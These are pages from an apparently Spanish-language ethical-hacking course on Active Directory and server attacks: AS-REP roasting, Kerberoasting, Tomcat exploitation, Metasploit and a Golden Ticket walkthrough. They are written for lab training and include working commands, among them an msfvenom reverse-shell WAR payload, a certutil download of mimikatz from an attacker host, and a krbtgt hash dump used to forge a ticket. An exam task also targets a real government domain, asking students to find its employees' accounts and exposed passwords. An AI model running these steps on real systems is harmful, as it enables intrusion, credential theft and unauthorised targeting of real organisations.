![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FvHS5db10OTPAitsR2o1m%252Fimage.png%3Falt%3Dmedia%26token%3D2e299776-5d95-4636-9d2f-8e7dbdb10f18&width=768&dpr=4&quality=100&sign=4207fef7&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FDrtGtBtlAW1B8DJf9qR1%252Fimage.png%3Falt%3Dmedia%26token%3De471ea86-99a0-4645-ba21-b31f09911530&width=768&dpr=4&quality=100&sign=5b83e635&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FgYNxatgKwI8hQaLfZAzo%252Fimage.png%3Falt%3Dmedia%26token%3D0e5a61fa-6d7b-4173-ba68-2f0b3e1f3b24&width=768&dpr=4&quality=100&sign=513aed3a&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FYIRvMrJDnw7vbF3fBHvH%252Fimage.png%3Falt%3Dmedia%26token%3Dd19d5f97-89a8-4a1a-ad01-ae47e3da7b82&width=768&dpr=4&quality=100&sign=1083c726&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252Fd6NIc95U0VVgqnyfCvod%252Fimage.png%3Falt%3Dmedia%26token%3D676b8a19-7864-456b-bac0-a9f1393d35c2&width=768&dpr=4&quality=100&sign=2999426&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252Fdh1CRptTAULdoBVtyg1c%252Fimage.png%3Falt%3Dmedia%26token%3D2ce104ce-7828-4ed0-901c-09c6768f0bb3&width=768&dpr=4&quality=100&sign=853d4cca&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FhdnI2bHd9DwHvwPiyXqk%252Fimage.png%3Falt%3Dmedia%26token%3Dee1af3f5-2711-4bf9-a407-dccde5fd031a&width=768&dpr=4&quality=100&sign=a932f0&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FnzzwnqOFqWRp7SB272pB%252Fimage.png%3Falt%3Dmedia%26token%3De8b1b08e-7ecd-4093-aec1-d34934278f47&width=768&dpr=4&quality=100&sign=42984ea2&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FN1QtUICpFE4z7SBHCU0t%252Fimage.png%3Falt%3Dmedia%26token%3D9b894a4b-9bf0-4671-94bd-efea7428b280&width=768&dpr=4&quality=100&sign=157084d2&sv=2) --- # AS REP-ROASTING | EH - Infraestructura [PreviousgMSA Password Attack](/ethical-infraestructura/gmsa-password-attack) [NextSpoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks](/ethical-infraestructura/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks) Last updated 7 months ago ### [](#concepto) Concepto El ASREPRoast es una técnica parecida a Kerberoasting que intenta crackear offline las contraseñas de los usuarios de servicio pero las de los que tienen el atributo DONT\_REQ\_PREAUTH, es decir, los que no se les requiere pre-autenticación en kerberos. **Requisitos**: * Ataque en una red Interna (red LAN). * Se requiere un listado de usuarios del dominio. * NO se requiere credenciales de acceso en el dominio. **Controles de Seguridad**: * No permitir autenticacion de KERBEROS previa. #### [](#procedimiento) Procedimiento: 1. A través de la librería IMPACKET: GET-NPUSERS 1. Identificar el tipo de HASH a utilizar 1. Cracking de contraseñas ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FkH63Y4qL06DC52BNAurI%252Fimage.png%3Falt%3Dmedia%26token%3Dd7249c6f-a179-4733-92dc-d62683c1b2dd&width=768&dpr=4&quality=100&sign=3babc151&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FDotAXD4Z6Gni2Vhqgybo%252Fimage.png%3Falt%3Dmedia%26token%3D57f11b43-c417-4357-b789-9e3a04442ee7&width=768&dpr=4&quality=100&sign=66f771c9&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FKZwzFRrIfcR0mPXt118X%252Fimage.png%3Falt%3Dmedia%26token%3D1bcaf498-0841-4b7c-81f0-e0f1b902642f&width=768&dpr=4&quality=100&sign=c7a0eb45&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FL4N1kFjsolQZe2SqbT8C%252Fimage.png%3Falt%3Dmedia%26token%3Dd6d19ad4-4bad-44f1-8866-fced5e60f30d&width=768&dpr=4&quality=100&sign=37e7a40e&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FKKTCQ6fyizi8pLr9WdtI%252Fimage.png%3Falt%3Dmedia%26token%3D26fdd3d3-c442-4457-b9dd-02af3997bc7d&width=768&dpr=4&quality=100&sign=6a8cd634&sv=2) --- # Kerberoasting | EH - Infraestructura [PreviousVulnerabilidad ZEROLOGON](/ethical-infraestructura/ganando-acceso/vulnerabilidad-zerologon) [NextCracking Online](/ethical-infraestructura/cracking-online) Last updated 7 months ago **Concepto**: Es la obtención de contraseñas en formato HASH de cuentas SPN (Service Principal Name) configurados en el DOMINIO. Una cuenta SPN, es una cuenta con un atributo que se le da a ciertos USUARIOS de dominio que están asociados a servicios de red. Por ejemplo, cuentas para servicios de Bases de Datos, cuentas para servicios IIS, etc. El HASH obtenido es CRACKEADO a través técnicas: Fuerza Bruta y Diccionario. **Requisitos**: * Ataque en una red Interna (red LAN). * Se requiere por lo menos una cuenta de dominio con credenciales. (no se requiere altos privilegios). **Controles de Seguridad**: * No configurar cuentas de ALTOS PRIVILEGIOS en el dominio sobre cuentas SPN. #### [](#instalacion-de-laboratorio) Instalación de Laboratorio 1. Creamos usuarios en el AD: SVC\_SQLService y SVC\_HTTPService 2. Lo configuramos como cuentas SPN En caso se requiera borrar una cuenta SPN: #### [](#procedimiento) Procedimiento: Hay dos maneras de explotar el Kerberoasting: 1. De manera local en el AD (con acceso al AD) --> Script en Powershell 2. A través de la red (sin acceso al AD) --> Librería Impacket ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FuiXLtGstp3XqUonLZNvZ%252Fimage.png%3Falt%3Dmedia%26token%3De6dc3441-556b-4f09-be92-cb748b3d3417&width=768&dpr=4&quality=100&sign=62a6c3a&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FZDOwCAcA7kre7pg8FbGM%252Fimage.png%3Falt%3Dmedia%26token%3D3394fe79-1815-439b-a640-33f560445710&width=768&dpr=4&quality=100&sign=310e2828&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252Fo27RPENWjQ9rtusNq4Yp%252Fimage.png%3Falt%3Dmedia%26token%3Dfc670d35-3fb0-4084-acd7-77acbafdcce5&width=768&dpr=4&quality=100&sign=cc13b9e&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FDE6Z8BdyRKJzuCL1657G%252Fimage.png%3Falt%3Dmedia%26token%3D54707bfc-c928-4cf1-b6ae-53321c65190f&width=768&dpr=4&quality=100&sign=685d9622&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FG8XFEiarqkwyvXxX717q%252Fimage.png%3Falt%3Dmedia%26token%3D156fb3f8-4c7e-4710-a86d-7bc5ec066768&width=768&dpr=4&quality=100&sign=3d931928&sv=2) --- # Vulnerabilidades TOMCAT | EH - Infraestructura [PreviousGanando Acceso](/ethical-infraestructura/ganando-acceso) [NextVulnerabilidad ZEROLOGON](/ethical-infraestructura/ganando-acceso/vulnerabilidad-zerologon) Last updated 2 years ago **Concepto**: Es un servicio que sirve para procesar página web, principalmente aplicaciones JAVA. Tomcat tiene vulnerabilidades: * **GHOSTCAT**: Vulnerabilidad que permite LFI (Local File Inclusion), es decir, leer archivos del servidor sin tener credenciales de acceso. * **Acceder al TOMCAT MANAGER**: Los servidores TOMCAT tienen una sección que permite administrar el servicio TOMCAT (detener, deploy, undeploy). Se puede acceder a través de credenciales débiles o por defecto. * **Enumeración de archivos por defecto**: Algunas versiones de TOMCAT vienen con SCRIPTs por defecto que pueden ser aprovechados. ### [](#rce-remote-code-execute) RCE (Remote Code Execute) **Método 1**: Deploy de archivo WAR manualmente * Descargar archivo WAR (WEBSHELL) * Deplay el WAR file y ejecutar comandos. * Crear un archivo WAR con MSFVENOM (es una utilitario de METASPLOIT para crear PAYLOADS) Copy └─# msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.4.100 LPORT=2222 -f war -o payload.war Método 2: Utilizar METASPLOIT y un EXPLOIT ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252F3bx1JPBml7wh59vuOIx8%252Fimage.png%3Falt%3Dmedia%26token%3D54a4706c-22c3-4242-bbcc-bf59020b6158&width=768&dpr=4&quality=100&sign=d1a6a00d&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FpWW1vlX0fqYqTDeL8wSA%252Fimage.png%3Falt%3Dmedia%26token%3D2c3ae328-f5af-4045-ab37-ec7943c40d8b&width=768&dpr=4&quality=100&sign=57c785c2&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FrvkNrmQyy40bdamsTHaR%252Fimage.png%3Falt%3Dmedia%26token%3D24d4e329-932a-4559-a68d-ef516c4e4b64&width=768&dpr=4&quality=100&sign=c61da3e1&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FGOioAOSeLHghNzSquoO2%252Fimage.png%3Falt%3Dmedia%26token%3D7e0534e5-7d1f-4807-b6d6-35f897be2aec&width=768&dpr=4&quality=100&sign=6bee4512&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FoAiBAYGOYyJA6Vl1059f%252Fimage.png%3Falt%3Dmedia%26token%3D74391b49-45d8-4ab8-ad2f-88f9aa02598d&width=768&dpr=4&quality=100&sign=34bbdd5d&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FOi4GhY0OxFiKteFhGwVK%252Fimage.png%3Falt%3Dmedia%26token%3Ddcea4169-8619-4089-92b8-9eee12db57b2&width=768&dpr=4&quality=100&sign=763314a2&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252Fuh8Tg0ffHNTogyo3rF5D%252Fimage.png%3Falt%3Dmedia%26token%3D09867d1f-c6d6-47f8-95b6-d6128fef72a6&width=768&dpr=4&quality=100&sign=a34e08ac&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FRN9O1Gfd7f2Sha43AuH5%252Fimage.png%3Falt%3Dmedia%26token%3D339f0ee8-49d3-4e56-ba4a-92d78b086379&width=768&dpr=4&quality=100&sign=1a7428fc&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FNlqOc5mIyGnz5ohtHssm%252Fimage.png%3Falt%3Dmedia%26token%3D9a8fc181-061d-4f00-9ddf-b08789c60997&width=768&dpr=4&quality=100&sign=d29fc267&sv=2) [![Logo](https://1517081779-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Favatar.png?generation=1572891120130012&alt=media)TomcatHackTricks](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/tomcat) --- # Ganando Acceso | EH - Infraestructura **Concepto**: Es la etapa donde se EXPLOTA la vulnerabilidad y se gana acceso al activo. **Terminología**: * Exploit: Es un binario que se aprovecha de la condición de vulnerable de un activo. Por lo general está desarrollado: ruby, C, python, php, etc. * Payload: Es la "carga útil", se puede entender como los comandos o funciones que se ejecutan después de ejecutado el exploit. * Metasploit: Es un FRAMEWORK (marco de trabajo) que contiene Exploits, Payloads y otras herramientas para vulnerar sistemas (escaneos, enumeración, etc). * Meterpreter: Es el PAYLOAD más conocido, fue desarrollado por los creadores de METASPLOIT. * RCE: Remote Code Execute (ejecución de código remoto). * Buffer Over Flow (BoF): Desbordamiento de memoria, permite ingresar PAYLOADs aprovechándose de un mal proceso de desarrollo. Herramientas para explotar vulnerabilidad: * METASPLOIT * CORE IMPACT ($$) * CANVAS ($$) * Script individuales (exploit-db) **Importantes**: * Antes de explotar una vulnerabilidad, es importante, CONOCER el detalle de la vulnerabilidad. * Los SCRIPTs individuales ayudan mucho. **METASPLOIT FRAMEWORK** **Concepto**: Es FRAMEWORK (Marco de Trabajo) que contiene exploits, payloads, herramientas auxiliares de escaneo, herramientas de administación, encoders, etc. Se puede desarrollar MÓDULOS dentro de Metasploit. Métodos de Acceso: * Interfaz Web (que nadie utiliza) * Consola (msfconsole) * GUI - Armitage ### [](#flujo-de-operaciones) Flujo de Operaciones Los pasos a seguir "clásicos" en METASPLOIT: * search \[módulo\] * use \[módulo\] * info * show options * set \[OPTION\] * set RHOSTS 192.168.4.1 * exploit | run ### [](#modulo-auxiliar) Módulo Auxiliar **Concepto**: Un módulo de ayuda. Permite: Escanear puertos, enumerar servicios, escanear vulnerabilidades, administrar servicios, DOS (denied of service). Nomenclatura: use auxiliary/\[sub-módulo\]/\[protocolo\]/\[accion\] Sub-módulos: scanner, admin, dos Por ejemplo: * use auxiliary/scanner/smb/smb\_version * use auxiliary/scanner/smb/ms17\__010_\_enternalblue #### [](#cracking-online) CRACKING ONLINE Concepto: El intento de acceso a un servicio en funcionamiento. Por ejemplo: acceder al servicio de MSSQL, acceder al FTP, acceder al SSH, etc. Tipos: * Fuerza Bruta: TODAS las opciones. No terminamos nunca. * Diccionario: Es limitado a las contraseñas más utilizadas. Herramientas: * METASPLOIT Auxiliar * HYDRA * CRACKMAPEXEC * Nmap NSE * MEDUSA * etc ### [](#modulo-exploit) Módulo Exploit **Concepto**: Contiene EXPLOITS que generan: BOF, accesos no autorizados, carga arbitraria de archivos, etc. **Nomenclatura**: Copy use exploit/[S.O/arq]/[protocolo]/[accion_a_realizar] Ejemplos: use exploit/windows/smb/ms17_010_eternalblue use exploit/multi/http/apache_tomcat_mgr_upload use exploit/unix/ftp/vsftpd2.4_upload MULTI: - CUANDO ES UN SERVICIO QUE SE EJECUTA EN CUALQUIER PLATAFORMA: - APACHE TOMCAT - APACHE SERVER - JBOSS - FTPSERVER ### [](#modulo-payload) Módulo Payload **Concepto**: Contiene los PAYLOADS a utilizar. Por defecto METASPLOIT utiliza siempre METERPRETER. **Nomenclatura**: Copy set payload [S.O/ARQ]/[PAYLOAD_NOMBRE]/[TIPO_CONEXION] Ejemplos: set payload windows/x64/meterpreter/bind_tcp set payload windows/x64/meterpreter/reverse_tcp set payload java/meterpreter/reverse_tcp set payload php/meterpreter/reverse_tcp **Tipos de Payloads**: * METERPRETER * SHELL * VNCINJECT **Tipos de Conexiones**: * Conexiones Directas (BIND TCP) * Conexiones Reversa (REVERSE TCP) **Importante**: El puerto que se abre para establecer la conexión se llama: LISTENER o HANDLER. **Importante**: TCP/4444 es el puerto por defecto. Se puede cambiar sin ningún problema. ### [](#meterpreter) METERPRETER **Concepto**: Es un de los PAYLOADs mas utilizados. De los mismos creados de METASPLOIT. Tiene diferentes comandos: Las opciones mas importantes: * getuid: para conocer el usuario con el que ingrese al sistema * getpid: para conocer el proceso ACTUAL en que se está ejecutando meterpreter. * sysinfo * cd * pwd: para saber en que carpeta estoy ubicado * ls | dir * ipconfig | ifconfig * ps: para listar procesos. * kill: para matar procesos. * migrate: para migrar a otro proceso * download: para descargar archivos * upload: para cargar archivos * screenshot: para tomar un print del escritorio del usuario. ### [](#modulo-post-explotacion) Módulo POST-Explotación [PreviousEscaneo](/ethical-infraestructura/escaneo) [NextVulnerabilidades TOMCAT](/ethical-infraestructura/ganando-acceso/vulnerabilidades-tomcat) Last updated 2 years ago ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252F7FBIy51SHzAOhhzpz1KX%252Fimage.png%3Falt%3Dmedia%26token%3D09680185-75d4-41db-a025-444092d80754&width=768&dpr=4&quality=100&sign=ebe1fab6&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252Fe8a4wusq7WBVqR5tqEpq%252Fimage.png%3Falt%3Dmedia%26token%3D1f72a9f8-23ea-4722-9322-6f9012b2914d&width=768&dpr=4&quality=100&sign=717ab21a&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FInavZBIs6e7cmftAF7zF%252Fimage.png%3Falt%3Dmedia%26token%3Dfa9752c9-968f-4195-8e8b-d4dd5077c954&width=768&dpr=4&quality=100&sign=eb9b5424&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FV2taveJoNJIJFf7bYcux%252Fimage.png%3Falt%3Dmedia%26token%3D26447891-9b69-485a-8f25-0c7fbc2170cd&width=768&dpr=4&quality=100&sign=8698dbc3&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FGgT9eQTNbW84ZJLqKd9a%252Fimage.png%3Falt%3Dmedia%26token%3Dc8c99213-ffe4-4d0d-ae18-5716235cfd22&width=768&dpr=4&quality=100&sign=b62b3103&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252Fn9MspuQ2S8x6Uni0MUEx%252Fimage.png%3Falt%3Dmedia%26token%3D138c3ca2-9f5c-4ce4-ab8d-e935e4dcc220&width=768&dpr=4&quality=100&sign=4ec3299&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FMQl0sMfTPsLQVcfMHBPq%252Fimage.png%3Falt%3Dmedia%26token%3D41c6c847-fe0f-4016-9db2-e7ee169bbe40&width=768&dpr=4&quality=100&sign=a52b4dac&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FTNAuAtF4GP2lQhcTd7z9%252Fimage.png%3Falt%3Dmedia%26token%3Dd7548354-41f6-4ef5-833d-2f5913efb560&width=768&dpr=4&quality=100&sign=66c7b2b2&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FDoUkFRd95ru8Qlih7Otq%252Fimage.png%3Falt%3Dmedia%26token%3D932e1dbc-77e4-4819-b772-ba218c4d6ecd&width=768&dpr=4&quality=100&sign=b16fcb8d&sv=2) --- # Examen 01 | EH - Infraestructura [PreviousAbuse DNSADMIN Group](/ethical-infraestructura/abuse-dnsadmin-group) [NextWindows - Elevación de Privilegios](/ethical-infraestructura/windows-elevacion-de-privilegios) Last updated 1 year ago 1. Realizar y documentar las siguientes actividades sobre el dominio: mef.gob.pe * Identificar todos los subdominios de la organización * Identificar las direcciones IP públicas de la organización. * Identificar el servidor de correo de la organización (mostrar portal de acceso al correo) * Empleados de la organización y sus cuentas de red. * Identificar contraseñas de la organización expuestas a Internet 2\. Realizar un escaneo de puertos al servidor Linux Metasplotaible 2: * Escanear los 100 puertos más comunes a través de la técnica de SYN SCAN e identificar el sistema operativo. * Escanear los 1000 puertos más comunes a través de la técnica de TCP CONNECT SCAN, identificarla versión de los servicios en los puertos abiertos. * Escanear todos los puertos abiertos del servidor e identificarla versión de los servicios en los puertos abiertos. 1. Realizar CRACKING ONLINE sobre Metasplotaible 2: * Identificar la contraseña del servicio MYSQL. Ingresar a MYSQL y listar las BD. * Identificar la contraseña del servicio VNC. Ingresar al Sist. Operativo por VNC. Examen 02: 3\. Realizar un ataque de CRACKING ONLINE sobre el servidor de Base de Datos MSSQL e identificar las contraseñas de los usuarios. 4\. A través del STORE PROCEDURE XP\_CMDSHELL, acceder al sistema operativo donde se encuentra la Base de Datos. Se requiere que se pueda tomar una evidencia de listado del directorio C. [![Logo](https://a.fsdn.com/con/img/sandiego/logo-180x180.png)Metasploitable - Browse /Metasploitable2 at SourceForge.net](https://sourceforge.net/projects/metasploitable/files/Metasploitable2/) --- # Golden Ticket | EH - Infraestructura [PreviousSpoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks](/ethical-infraestructura/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks) [NextnoPAC Attack](/ethical-infraestructura/nopac-attack) Last updated 4 months ago [](#concepto) Concepto --------------------------- * Es un ataque sobre el Active Directory de Microsoft que permite obtener PERSISTENCIA sobre el entorno del Active Directory sin necesidad de tener credenciales. * El GOLDEN TICKET consiste en crear un ticket con privilegios de administración para firmar los accesos. * Para realizar el ataque, se requiere tener acceso a la contraseña HASH del usuario "KRBTGT". Esta cuenta emita y valida los tickets de kerberos. ### [](#funcionamiento-normal) Funcionamiento Normal: ### [](#estructura-del-ataque) Estructura del Ataque: * **Ticket Granting Ticket (TGT):** confirms to other servers that user has been authenticated. * **Ticket Granting Server (TGS):** User request for TGS from the KDC that will be used to access the service of the application server. [](#ejemplo-de-ataque-golden-ticket) Ejemplo de Ataque: Golden Ticket -------------------------------------------------------------------------- * Cargar en el AD el MIMIKATZ. Copy // Some code ┌──(root㉿kali)-[/usr/share/windows-resources/mimikatz/x64] └─# python2.7 -m SimpleHTTPServer * Se decarga el MIMKATZ en el AD Copy // Some code ┌──(root㉿kali)-[~] └─# impacket-psexec enterprise.com/Administrator:'Passw0rd2025'@192.168.4.100 Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation C:\Windows\system32> cd .. C:\Windows> cd test C:\Windows\test> certutil.exe -f -urlcache -split http://192.168.4.128:8000/mimikatz.exe mimikatz.exe * Ejecutamos MIMIKATZ en el AD para obtener datos del usuario KRBTGT Copy C:\Windows\test> mimikatz.exe .#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz # privilege::debug mimikatz # lsadump::lsa /inject /name:krbtgt mimikatz # Domain : ENTERPRISE / S-1-5-21-1181767541-559474198-1654905306 RID : 000001f6 (502) User : krbtgt * Primary NTLM : 733b7a2ead01888656f52d23826b0dba * Creamos el GOLDEN TICKET Copy kerberos::golden /domain:enterprise.com /sid:S-1-5-21-1181767541-559474198-1654905306 /rc4:733b7a2ead01888656f52d23826b0dba /user:Administrator /ticket:golden.kirbi * Transferimos el archivo GOLDEN.KIRBI 